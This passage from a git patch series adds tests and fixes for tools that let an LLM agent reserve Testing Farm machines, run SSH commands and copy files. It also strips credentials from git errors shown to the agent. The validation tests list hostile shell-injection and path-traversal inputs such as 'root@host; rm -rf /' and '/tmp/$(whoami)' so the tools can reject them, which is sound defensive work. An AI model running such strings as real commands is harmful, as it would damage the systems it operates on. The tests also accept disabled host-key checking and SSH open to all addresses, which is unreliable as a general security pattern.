AAAAC3NzaC1lZDI1NTE5AAAAIGatewayKey gateway@mcp" + + +@pytest.fixture(autouse=True) +def _mock_gateway_ssh_key(): + """Mock _ensure_gateway_ssh_key so tests don't generate real keys.""" + with patch.object(tf_module, "_ensure_gateway_ssh_key", return_value=GATEWAY_SSH_KEY): + yield + + +@pytest.mark.asyncio +async def test_reserve_machine_dry_run(monkeypatch): + """DRY_RUN=true returns a fake ID without calling the API.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + result = out.result + assert result["id"] == "dry-run-reservation" + assert "Dry run" in result["message"] + assert "RHEL-9.8.0-Nightly" in result["message"] + assert "x86_64" in result["message"] + assert "60m" in result["message"] + + +@pytest.mark.asyncio +async def test_reserve_machine_request_body(monkeypatch): + """Verify the request body structure matches the reserve-system pattern.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + # Clear the cached headers so the monkeypatched env var is picked up + tf_module._testing_farm_headers.cache_clear() + + captured = {} + + def fake_post(path, json): + captured["path"] = path + captured["body"] = json + return {"id": "req-001"} + + flexmock(tf_module).should_receive("_testing_farm_api_post").replace_with(fake_post).once() + + await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "arch": "aarch64", + "duration_minutes": 120, + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + + assert captured["path"] == "requests" + body = captured["body"] + + # Top-level test section uses fmf with plan name + assert body["test"] == { + "fmf": { + "url": "https://gitlab.com/testing-farm/tests", + "ref": "main", + "name": "/testing-farm/reserve", + } + } + assert len(body["environments"]) == 1 + + env = body["environments"][0] + assert env["arch"] == "aarch64" + assert env["os"] == 
{"compose": "RHEL-9.8.0-Nightly"} + + # Duration must be passed as a string + assert env["variables"]["TF_RESERVATION_DURATION"] == "120" + + # SSH key must be the gateway's own key, base64-encoded + expected_b64 = base64.b64encode(GATEWAY_SSH_KEY.encode()).decode() + assert env["secrets"]["TF_RESERVATION_AUTHORIZED_KEYS_BASE64"] == expected_b64 + + # No tmt extra_args in environment — standalone reservation uses test.fmf + assert "tmt" not in env + + # Security group rules allow SSH from anywhere + ingress = env["settings"]["provisioning"]["security_group_rules_ingress"] + assert len(ingress) == 1 + assert ingress[0]["protocol"] == "tcp" + assert ingress[0]["port_min"] == 22 + assert ingress[0]["port_max"] == 22 + assert ingress[0]["cidr"] == "0.0.0.0/0" + + # Pipeline timeout must be set + assert body["settings"]["pipeline"]["timeout"] == 720 + + +@pytest.mark.asyncio +async def test_reserve_machine_returns_request_id(monkeypatch): + """The tool returns the request ID from the API response.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_post").and_return( + {"id": "abc-123"} + ).once() + + out = await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + assert out.result == {"id": "abc-123"} + + +@pytest.mark.asyncio +async def test_reserve_machine_default_arch(monkeypatch): + """Default arch is x86_64 when not specified.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + captured = {} + + def fake_post(path, json): + captured["body"] = json + return {"id": "req-002"} + + flexmock(tf_module).should_receive("_testing_farm_api_post").replace_with(fake_post).once() + + await ReserveTestingFarmMachineTool().run( + input={ + "compose": "RHEL-9.8.0-Nightly", + "ssh_public_key": SAMPLE_SSH_KEY, + } + ) + + env = 
captured["body"]["environments"][0] + assert env["arch"] == "x86_64" + + +@pytest.mark.asyncio +async def test_reserve_machine_ssh_key_encoding(monkeypatch): + """The gateway's SSH key is properly base64-encoded (agent-provided key is ignored).""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + captured = {} + + def fake_post(path, json): + captured["body"] = json + return {"id": "req-003"} + + flexmock(tf_module).should_receive("_testing_farm_api_post").replace_with(fake_post).once() + + agent_key = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQ+test user@host" + + await ReserveTestingFarmMachineTool().run( + input={ + "compose": "Fedora-41", + "ssh_public_key": agent_key, + } + ) + + stored_b64 = captured["body"]["environments"][0]["secrets"][ + "TF_RESERVATION_AUTHORIZED_KEYS_BASE64" + ] + + # Gateway key is used, not the agent-provided key + decoded = base64.b64decode(stored_b64).decode() + assert decoded == GATEWAY_SSH_KEY + assert decoded != agent_key + + +# -- GetTestingFarmReservationDetailsTool tests -- + + +@pytest.mark.asyncio +async def test_reservation_details_dry_run(monkeypatch): + """DRY_RUN=true returns complete state with dry-run-host.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-dry-001"} + ) + assert out.result == {"state": "complete", "ssh_connection": "root@dry-run-host"} + + +@pytest.mark.asyncio +async def test_reservation_details_running_with_guest(monkeypatch): + """When pipeline.log has guest IP and task #1 started, ssh_connection is extracted.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/abc123"}, + } + + pipeline_log = ( + "some log output\n" + "Guest is ready at root@10.0.0.1\n" + "more output\n" + "execute task #1\n" + ) + + 
flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-100" + ).and_return(api_response).once() + + mock_resp = flexmock(ok=True, text=pipeline_log) + flexmock(requests).should_receive("get").with_args( + "https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 + ).and_return(mock_resp).once() + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-100"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} + + +@pytest.mark.asyncio +async def test_reservation_details_pending_then_canceled(monkeypatch): + """When state is pending then transitions to canceled, returns canceled.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-200" + ).and_return({"state": "pending"}).and_return({"state": "canceled"}) + + monkeypatch.setattr(asyncio, "sleep", AsyncMock()) + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-200"} + ) + assert out.result == {"state": "canceled", "ssh_connection": "not-yet-available"} + + +@pytest.mark.asyncio +async def test_reservation_details_running_no_task_then_ready(monkeypatch): + """When task #1 hasn't started on first poll, polls again until ready.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/abc123"}, + } + + log_not_ready = "Guest is ready at root@10.0.0.1\nprovisioning still in progress\n" + log_ready = "Guest is ready at root@10.0.0.1\nexecute task #1\n" + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-300" + ).and_return(api_response) + + flexmock(requests).should_receive("get").with_args( + 
"https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 + ).and_return(flexmock(ok=True, text=log_not_ready)).and_return( + flexmock(ok=True, text=log_ready) + ) + + monkeypatch.setattr(asyncio, "sleep", AsyncMock()) + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-300"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} + + +@pytest.mark.asyncio +async def test_reservation_details_multihost_pattern(monkeypatch): + """Multihost pattern with 'primary address:' is also matched.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/def456"}, + } + + pipeline_log = ( + "[guest1] primary address: 10.0.0.99\n" + "execute task #1\n" + ) + + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-400" + ).and_return(api_response).once() + + mock_resp = flexmock(ok=True, text=pipeline_log) + flexmock(requests).should_receive("get").with_args( + "https://artifacts.testing-farm.io/def456/pipeline.log", timeout=30 + ).and_return(mock_resp).once() + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-400"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.99"} + + +@pytest.mark.asyncio +async def test_reservation_details_multihost_realistic_tag(monkeypatch): + """Multihost pattern with realistic TF tag containing dashes, dots, colons, slashes.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + api_response = { + "state": "running", + "run": {"artifacts": "https://artifacts.testing-farm.io/ghi789"}, + } + + pipeline_log = ( + "[RHEL-10.0-Nightly:x86_64:/testing-farm/reserve] primary address: 10.31.8.81\n" + "execute task #1\n" + ) + + 
flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( + "requests/req-500" + ).and_return(api_response).once() + + mock_resp = flexmock(ok=True, text=pipeline_log) + flexmock(requests).should_receive("get").with_args( + "https://artifacts.testing-farm.io/ghi789/pipeline.log", timeout=30 + ).and_return(mock_resp).once() + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-500"} + ) + assert out.result == {"state": "running", "ssh_connection": "root@10.31.8.81"} + + +# -- CancelTestingFarmRequestTool tests -- + + +@pytest.mark.asyncio +async def test_cancel_request_dry_run(monkeypatch): + """DRY_RUN=true returns cancelled=True with message, no API call.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await CancelTestingFarmRequestTool().run( + input={"request_id": "req-cancel-dry"} + ) + result = out.result + assert result["cancelled"] is True + assert result["request_id"] == "req-cancel-dry" + assert "Dry run" in result["message"] + assert "req-cancel-dry" in result["message"] + + +@pytest.mark.asyncio +async def test_cancel_request_calls_delete(monkeypatch): + """The tool calls _testing_farm_api_delete with the correct path.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( + "requests/req-500" + ).once() + + await CancelTestingFarmRequestTool().run( + input={"request_id": "req-500"} + ) + + +@pytest.mark.asyncio +async def test_cancel_request_returns_confirmation(monkeypatch): + """The tool returns cancelled=True and the request_id.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( + "requests/req-600" + ).once() + + out = await CancelTestingFarmRequestTool().run( + input={"request_id": "req-600"} + ) + assert out.result == 
{"cancelled": True, "request_id": "req-600"} + + +# -- RunRemoteCommandTool tests -- + + +def _make_fake_process(stdout=b"", stderr=b"", returncode=0): + """Create a mock asyncio subprocess process.""" + proc = MagicMock() + proc.communicate = AsyncMock(return_value=(stdout, stderr)) + proc.returncode = returncode + proc.kill = MagicMock() + proc.wait = AsyncMock() + return proc + + +@pytest.mark.asyncio +async def test_run_remote_command_dry_run(monkeypatch): + """DRY_RUN=true returns fake result without executing SSH.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await RunRemoteCommandTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "command": "uname -r", + } + ) + result = out.result + assert result["stdout"] == "" + assert result["stderr"] == "" + assert result["exit_code"] == 0 + assert "Dry run" in result["message"] + assert "uname -r" in result["message"] + assert "root@10.0.0.1" in result["message"] + + +@pytest.mark.asyncio +async def test_run_remote_command_success(monkeypatch): + """Successful SSH command returns stdout/stderr/exit_code and uses correct SSH args.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process( + stdout=b"5.14.0-362.el9.x86_64\n", + stderr=b"", + returncode=0, + ) + + with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc) as mock_exec: + out = await RunRemoteCommandTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "command": "uname -r", + } + ) + + # Verify SSH args include -i for gateway key + mock_exec.assert_called_once_with( + "ssh", + "-i", str(_SSH_KEY_PATH), + "-o", "StrictHostKeyChecking=no", + "-o", "UserKnownHostsFile=/dev/null", + "root@10.0.0.1", + "uname -r", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) + + result = out.result + assert result["stdout"] == "5.14.0-362.el9.x86_64\n" + assert result["stderr"] == "" + assert result["exit_code"] == 0 + + +@pytest.mark.asyncio +async def 
test_run_remote_command_nonzero_exit(monkeypatch): + """Non-zero exit code is passed through, not treated as an error.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process( + stdout=b"", + stderr=b"ls: cannot access '/nope': No such file or directory\n", + returncode=1, + ) + + with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc): + out = await RunRemoteCommandTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "command": "ls /nope", + } + ) + + result = out.result + assert result["exit_code"] == 1 + assert result["stdout"] == "" + assert "No such file or directory" in result["stderr"] + + +# -- CopyFilesToRemoteTool tests -- + + +@pytest.mark.asyncio +async def test_copy_files_dry_run(monkeypatch): + """DRY_RUN=true returns fake result without executing SSH/SCP.""" + monkeypatch.setenv("DRY_RUN", "true") + + out = await CopyFilesToRemoteTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "local_paths": ["/tmp/test.sh", "/tmp/data.txt"], + } + ) + result = out.result + assert result["copied"] is True + assert result["remote_dir"] == "/tmp/reproducer" + assert result["files"] == ["/tmp/test.sh", "/tmp/data.txt"] + assert "Dry run" in result["message"] + assert "root@10.0.0.1" in result["message"] + + +@pytest.mark.asyncio +async def test_copy_files_success(monkeypatch): + """Successful copy runs mkdir then scp, returns correct result.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + mkdir_proc = _make_fake_process(stdout=b"", stderr=b"", returncode=0) + scp_proc = _make_fake_process(stdout=b"", stderr=b"", returncode=0) + + call_count = 0 + + async def fake_create_subprocess_exec(*args, **kwargs): + nonlocal call_count + call_count += 1 + if call_count == 1: + return mkdir_proc + return scp_proc + + with patch("asyncio.create_subprocess_exec", side_effect=fake_create_subprocess_exec) as mock_exec: + out = await CopyFilesToRemoteTool().run( + input={ + "ssh_host": "root@10.0.0.1", + 
"local_paths": ["/tmp/test.sh"], + "remote_dir": "/opt/work", + } + ) + + # Two calls: mkdir and scp + assert mock_exec.call_count == 2 + + # First call: ssh mkdir (with -i for gateway key) + mkdir_call = mock_exec.call_args_list[0] + mkdir_args = mkdir_call[0] + assert mkdir_args[0] == "ssh" + assert str(_SSH_KEY_PATH) in mkdir_args + assert "StrictHostKeyChecking=no" in mkdir_args + assert "root@10.0.0.1" in mkdir_args + assert "mkdir" in mkdir_args + assert "-p" in mkdir_args + assert "/opt/work" in mkdir_args + + # Second call: scp (with -i for gateway key) + scp_call = mock_exec.call_args_list[1] + scp_args = scp_call[0] + assert scp_args[0] == "scp" + assert str(_SSH_KEY_PATH) in scp_args + assert "-r" in scp_args + assert "/tmp/test.sh" in scp_args + assert "root@10.0.0.1:/opt/work" in scp_args + + result = out.result + assert result["copied"] is True + assert result["remote_dir"] == "/opt/work" + assert result["files"] == ["/tmp/test.sh"] + + +# -- Error-path / validation tests -- + + +@pytest.mark.asyncio +async def test_run_remote_command_timeout_kills_process(monkeypatch): + """Timeout triggers proc.kill() and raises ToolError.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process() + fake_proc.communicate = AsyncMock(side_effect=asyncio.TimeoutError) + + with ( + patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc), + pytest.raises(ToolError, match="timed out"), + ): + await RunRemoteCommandTool().run( + input={"ssh_host": "root@10.0.0.1", "command": "sleep 999", "timeout": 5} + ) + + fake_proc.kill.assert_called_once() + fake_proc.wait.assert_awaited_once() + + +@pytest.mark.asyncio +async def test_copy_files_timeout_kills_process(monkeypatch): + """CopyFilesToRemoteTool timeout triggers proc.kill() and raises ToolError.""" + monkeypatch.delenv("DRY_RUN", raising=False) + + fake_proc = _make_fake_process() + fake_proc.communicate = AsyncMock(side_effect=asyncio.TimeoutError) + + with ( + 
patch("asyncio.create_subprocess_exec", new_callable=AsyncMock, return_value=fake_proc), + pytest.raises(ToolError, match="timed out"), + ): + await CopyFilesToRemoteTool().run( + input={ + "ssh_host": "root@10.0.0.1", + "local_paths": ["/tmp/test.sh"], + "timeout": 5, + } + ) + + fake_proc.kill.assert_called_once() + fake_proc.wait.assert_awaited_once() + + +@pytest.mark.parametrize("bad_host", [ + "root@host; rm -rf /", + "root@host && curl evil.com", + "user@host|cat /etc/passwd", + "root@", +]) +def test_ssh_host_pattern_rejects_injection(bad_host): + """ssh_host pattern blocks shell metacharacters.""" + with pytest.raises(ValidationError): + CopyFilesToRemoteToolInput( + ssh_host=bad_host, + local_paths=["/tmp/test.sh"], + ) + + +def test_local_paths_guard_rejects_outside_allowed_dirs(): + """local_paths guard rejects paths outside /git-repos/ and /tmp/.""" + with pytest.raises(ValidationError, match="not under an allowed directory"): + CopyFilesToRemoteToolInput( + ssh_host="root@10.0.0.1", + local_paths=["/etc/passwd"], + ) + + +def test_local_paths_guard_rejects_traversal(): + """local_paths guard rejects directory traversal attempts.""" + with pytest.raises(ValidationError, match="not under an allowed directory"): + CopyFilesToRemoteToolInput( + ssh_host="root@10.0.0.1", + local_paths=["/tmp/../../etc/passwd"], + ) + + +@pytest.mark.parametrize("bad_dir", [ + "/tmp/foo; curl evil.com", + "/tmp/foo && rm -rf /", + "/tmp/$(whoami)", + "/tmp/`id`", +]) +def test_remote_dir_pattern_rejects_injection(bad_dir): + """remote_dir pattern blocks shell metacharacters.""" + with pytest.raises(ValidationError): + CopyFilesToRemoteToolInput( + ssh_host="root@10.0.0.1", + local_paths=["/tmp/test.sh"], + remote_dir=bad_dir, + ) + + +@pytest.mark.parametrize("bad_id", [ + "../../admin", + "req-123/../../secrets", + "req 123", + "req;drop", +]) +def test_request_id_pattern_rejects_traversal(bad_id): + """request_id pattern blocks path traversal and special characters.""" + 
with pytest.raises(ValidationError): + GetTestingFarmReservationDetailsToolInput(request_id=bad_id) + with pytest.raises(ValidationError): + CancelTestingFarmRequestToolInput(request_id=bad_id) + + +@pytest.mark.asyncio +async def test_reservation_details_transient_http_error_retries(monkeypatch): + """Transient 503 during polling is retried instead of aborting.""" + monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") + tf_module._testing_farm_headers.cache_clear() + + mock_response_503 = MagicMock() + mock_response_503.status_code = 503 + + call_count = 0 + + def fake_get(path, params=None): + nonlocal call_count + call_count += 1 + if call_count == 1: + err = requests.HTTPError(response=mock_response_503) + raise err + return {"state": "complete"} + + flexmock(tf_module).should_receive("_testing_farm_api_get").replace_with(fake_get) + monkeypatch.setattr(asyncio, "sleep", AsyncMock()) + + out = await GetTestingFarmReservationDetailsTool().run( + input={"request_id": "req-transient"} + ) + assert out.result["state"] == "complete" + assert call_count == 2 From a207927d6a7ad0d170b67bc7a64d64de30d7cd71 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:26:21 +0200 Subject: [PATCH 07/16] Register Testing Farm and SSH tools in MCP gateway Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gateway.py | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/ymir/tools/privileged/gateway.py b/ymir/tools/privileged/gateway.py index 1099cb47..e55d7b16 100644 --- a/ymir/tools/privileged/gateway.py +++ b/ymir/tools/privileged/gateway.py @@ -56,8 +56,13 @@ ) from ymir.tools.privileged.maintainer_rules import MaintainerRulesTool from ymir.tools.privileged.testing_farm import ( + CancelTestingFarmRequestTool, + CopyFilesToRemoteTool, GetTestingFarmRequestTool, + GetTestingFarmReservationDetailsTool, ReproduceTestingFarmRequestTool, + ReserveTestingFarmMachineTool, + RunRemoteCommandTool, ) from ymir.tools.privileged.zstream_search 
import ZStreamSearchTool @@ -143,6 +148,11 @@ def main(): GetErratumBuildNvrTool(options=tool_options), GetTestingFarmRequestTool(options=tool_options), ReproduceTestingFarmRequestTool(options=tool_options), + ReserveTestingFarmMachineTool(options=tool_options), + GetTestingFarmReservationDetailsTool(options=tool_options), + CancelTestingFarmRequestTool(options=tool_options), + RunRemoteCommandTool(options=tool_options), + CopyFilesToRemoteTool(options=tool_options), AddJiraAttachmentsTool(options=tool_options), AddJiraCommentTool(options=tool_options), ChangeJiraStatusTool(options=tool_options), From c5db93b3142d199106eb67e3431bba52584abf43 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:52:46 +0200 Subject: [PATCH 08/16] Fix push_to_remote_repository silent failures and credential leakage Before: push failures returned only "Failed to push to the specified repository" with no detail. Worse, git stderr could contain credential helper output (Authorization headers, Basic auth tokens) which would be logged or returned to the LLM agent verbatim. Fix: capture stderr via subprocess.PIPE + communicate(), filter it through _sanitize_git_stderr (strips lines matching auth-related patterns), and include the sanitized output in the error message. 
Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gitlab.py | 53 +++++++++++++++---- .../privileged/tests/unit/test_gitlab.py | 8 +-- 2 files changed, 48 insertions(+), 13 deletions(-) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index bf4e7741..4abc60f0 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -129,6 +129,20 @@ def _get_auth_headers(url: str) -> dict[str, str]: return headers +_SENSITIVE_STDERR_RE = re.compile( + r"authorization|basic\s+[A-Za-z0-9+/=]|token|password|credential", + re.IGNORECASE, +) + + +def _sanitize_git_stderr(text: str) -> str: + """Filter out lines from git stderr that may contain auth credentials.""" + return "\n".join( + line for line in text.splitlines() + if not _SENSITIVE_STDERR_RE.search(line) + ) + + def _get_git_auth_args(repository_url: str) -> list[str]: """Return ``git -c`` args that authenticate via HTTP Basic auth. @@ -514,17 +528,36 @@ async def _run( context: RunContext, ) -> StringToolOutput: repository = tool_input.repository - clone_path = tool_input.clone_path branch = tool_input.branch - force = tool_input.force - auth_args = _get_git_auth_args(repository) - command = ["git", *auth_args, "push", repository, branch] - if force: - command.append("--force") - proc = await asyncio.create_subprocess_exec(command[0], *command[1:], cwd=clone_path) - if await proc.wait(): - raise ToolError("Failed to push to the specified repository") - return StringToolOutput(result=f"Successfully pushed the specified branch to {repository}") + + try: + clone_path = tool_input.clone_path + force = tool_input.force + auth_args = _get_git_auth_args(repository) + command = ["git", *auth_args, "push", repository, branch] + if force: + command.append("--force") + env = _get_mock_git_env() + proc = await asyncio.create_subprocess_exec( + command[0], *command[1:], + cwd=clone_path, + env=env, + stdout=asyncio.subprocess.DEVNULL, + stderr=asyncio.subprocess.PIPE, + ) + 
_, stderr = await proc.communicate() + if proc.returncode: + stderr_text = stderr.decode(errors="replace").strip() if stderr else "" + safe_stderr = _sanitize_git_stderr(stderr_text) + detail = safe_stderr or f"exit code {proc.returncode} (stderr redacted)" + logger.error("git push failed (exit %d): %s", proc.returncode, detail) + raise ToolError(f"Failed to push to {repository}: {detail}") + return StringToolOutput(result=f"Successfully pushed the specified branch to {repository}") + except ToolError: + raise + except Exception as e: + logger.error(f"Failed to push to repository {repository}: {e}") + raise ToolError(f"Failed to push to repository {repository}: {e}") from e class AddMergeRequestLabelsToolInput(BaseModel): diff --git a/ymir/tools/privileged/tests/unit/test_gitlab.py b/ymir/tools/privileged/tests/unit/test_gitlab.py index 3b7486de..46f58fc7 100644 --- a/ymir/tools/privileged/tests/unit/test_gitlab.py +++ b/ymir/tools/privileged/tests/unit/test_gitlab.py @@ -241,11 +241,13 @@ async def create_subprocess_exec(cmd, *args, **kwargs): assert args[1].endswith(repository.removeprefix("https://")) assert args[2] == branch assert kwargs.get("cwd") == clone_path + assert kwargs.get("stdout") == asyncio.subprocess.DEVNULL + assert kwargs.get("stderr") == asyncio.subprocess.PIPE - async def wait(): - return 0 + async def communicate(): + return (None, b"") - return flexmock(wait=wait) + return flexmock(communicate=communicate, returncode=0) flexmock(asyncio).should_receive("create_subprocess_exec").replace_with(create_subprocess_exec) result = ( From cf133dfea2d274772620ad0a984f3d09866de255 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:53:43 +0200 Subject: [PATCH 09/16] Fix clone_repository failing on non-empty target directory Before: clone_repository unconditionally called mkdir(exist_ok=True) then git clone, which fails with "destination path already exists" if a previous clone attempt left a partial directory behind (e.g. 
a network failure mid-clone). Fix: for branchless clones (the common path), remove the target directory if it already exists before cloning. The rmtree is guarded by an allowlist of safe parent directories (/git-repos/, /tmp/) to prevent accidental deletion of arbitrary paths. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gitlab.py | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index 4abc60f0..43597237 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -4,6 +4,7 @@ import logging import os import re +import shutil from pathlib import Path from typing import Any from urllib.parse import quote, urlparse @@ -475,9 +476,8 @@ async def _run( auth_args = _get_git_auth_args(repository) git_env = _get_mock_git_env() - clone_path.mkdir(parents=True, exist_ok=True) - if branch: + clone_path.mkdir(parents=True, exist_ok=True) proc = await asyncio.create_subprocess_exec("git", "init", cwd=clone_path, env=git_env) if await proc.wait(): raise ToolError(f"Failed to initialize git repo at {clone_path}") @@ -493,6 +493,17 @@ async def _run( if await proc.wait(): raise ToolError(f"Failed to checkout branch {branch}") else: + if clone_path.exists(): + allowed_parents = { + Path(os.environ.get("GIT_REPO_BASEPATH", "/git-repos")), + Path("/tmp"), # noqa: S108 + } + if not any(clone_path.resolve().is_relative_to(p) for p in allowed_parents): + raise ToolError( + f"Refusing to remove {clone_path}: not under an allowed base directory" + ) + await asyncio.to_thread(shutil.rmtree, clone_path) + clone_path.parent.mkdir(parents=True, exist_ok=True) command = ["git", *auth_args, "clone", repository, str(clone_path)] proc = await asyncio.create_subprocess_exec(command[0], *command[1:], env=git_env) if await proc.wait(): From db7b34f994b3917f884822790c8dba56e8071c47 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:56:17 
+0200 Subject: [PATCH 10/16] Fix ToolError double-wrapping in existing GitLab tools The `except Exception` handlers in 5 tools (AddMergeRequestLabels, AddMergeRequestComment, GetAuthorizedCommentsFromMergeRequest, GetMergeRequestDetails, SearchGitlabProjectMrs) catch ToolError alongside genuine exceptions, wrapping it in a second ToolError and losing the specific error message. Add `except ToolError: raise` before each `except Exception` to preserve the original error. Also remove the stale local `from beeai_framework.tools import ToolError` in SearchGitlabProjectMrsTool in favor of the existing top-level import. Co-Authored-By: Claude Opus 4.6 --- ymir/tools/privileged/gitlab.py | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/ymir/tools/privileged/gitlab.py b/ymir/tools/privileged/gitlab.py index 43597237..02799c25 100644 --- a/ymir/tools/privileged/gitlab.py +++ b/ymir/tools/privileged/gitlab.py @@ -604,6 +604,8 @@ async def _run( return StringToolOutput( result=f"Successfully added labels {labels} to merge request {merge_request_url}" ) + except ToolError: + raise except Exception as e: raise ToolError(f"Failed to add labels to merge request: {e}") from e @@ -638,6 +640,8 @@ async def _run( mr = await _get_merge_request_from_url(merge_request_url) await asyncio.to_thread(mr._raw_pr.notes.create, {"body": comment}) return StringToolOutput(result=f"Successfully added comment to merge request {merge_request_url}") + except ToolError: + raise except Exception as e: raise ToolError(f"Failed to add comment to merge request: {e}") from e @@ -910,6 +914,8 @@ async def _run( try: comments = await _fetch_authorized_comments_from_merge_request_url(merge_request_url) return JSONToolOutput(result=comments) + except ToolError: + raise except Exception as e: raise ToolError(f"Failed to get authorized comments from merge request: {e}") from e @@ -960,6 +966,8 @@ async def _run( comments=[c for c in comments if f"@{username}" in c.message], ) ) + 
except ToolError: + raise except Exception as e: raise ToolError(f"Failed to get merge request details: {e}") from e @@ -1200,7 +1208,7 @@ async def _run( logger.info("Found %d MR(s) for %s in %s", len(results), search, project) return JSONToolOutput(result=results) + except ToolError: + raise except Exception as e: - from beeai_framework.tools import ToolError - raise ToolError(f"Failed to search MRs in {project}: {e}") from e From 7b8b03d1663a6168fd86b2b6283f75aef1317f63 Mon Sep 17 00:00:00 2001 From: Vincent Mihalkovic Date: Thu, 18 Jun 2026 09:56:48 +0200 Subject: [PATCH 11/16] Add Testing Farm cleanup middleware for crash recovery Event-based middleware that tracks active Testing Farm reservations during agent runs. If the agent crashes or is interrupted, any reservations left in the tracker are cancelled on cleanup, preventing orphaned machines from burning Testing Farm quota. Listens for tool success/error events and maintains a set of active request IDs, removing them when the agent cancels them normally. 
